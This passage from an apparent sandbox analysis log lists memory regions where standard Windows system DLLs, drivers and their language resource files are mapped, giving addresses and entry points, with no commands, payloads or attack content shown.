"c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3766 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3767 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3768 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3769 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3770 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3771 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3772 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3773 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3774 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3775 start_va = 0xd70000 end_va = 0xd97fff monitored = 0 entry_point = 0xd71860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3776 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 3777 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3778 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3779 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3780 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3781 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3782 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3783 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3784 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3785 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3786 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3787 start_va = 0x120000 end_va = 0x12afff monitored = 0 entry_point = 0x1211a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 3788 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 3789 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3790 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3791 start_va = 0x120000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 3792 start_va = 0x130000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3793 start_va = 0x13f0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x14d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3794 start_va = 0x13f0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x14d3268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 3795 start_va = 0x13f0000 end_va = 0x1499fff monitored = 0 entry_point = 0x1404100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3796 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3797 start_va = 0x13f0000 end_va = 0x1499fff monitored = 0 entry_point = 0x1404100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 3798 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 3799 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3800 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3801 start_va = 0xe30000 end_va = 0xe77fff monitored = 0 entry_point = 0xe6fd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 3802 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 3803 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3804 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3805 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3806 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3807 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3808 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3809 start_va = 0x13f0000 end_va = 0x14d8fff monitored = 0 entry_point = 0x14c906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3810 start_va = 0x120000 end_va = 0x128fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3811 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3812 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3813 start_va = 0x13f0000 end_va = 0x153cfff monitored = 0 entry_point = 0x14f2a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 3814 start_va = 0x120000 end_va = 0x125fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 3815 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3816 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3817 start_va = 0x120000 end_va = 0x12efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 3818 start_va = 0xe30000 end_va = 0xe89fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 3819 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3820 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3821 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3822 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3823 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3824 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3825 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3826 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3827 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3828 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3829 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3830 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3831 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3832 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3833 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3834 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3835 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3836 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3837 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3838 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3839 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3840 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3841 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3842 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3843 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3844 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3845 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3846 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3847 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3848 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3849 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3850 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3851 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3852 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3853 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3854 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3855 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3856 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3857 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3858 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3859 start_va = 0x13f0000 end_va = 0x14cbfff monitored = 0 entry_point = 0x1465ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3860 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3861 start_va = 0x13f0000 end_va = 0x14cbfff monitored = 0 entry_point = 0x1465ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3862 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3863 start_va = 0x13f0000 end_va = 0x14d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3864 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3865 start_va = 0x13f0000 end_va = 0x14d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3866 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3867 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3868 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3869 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3870 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3871 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3872 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3873 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3874 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = 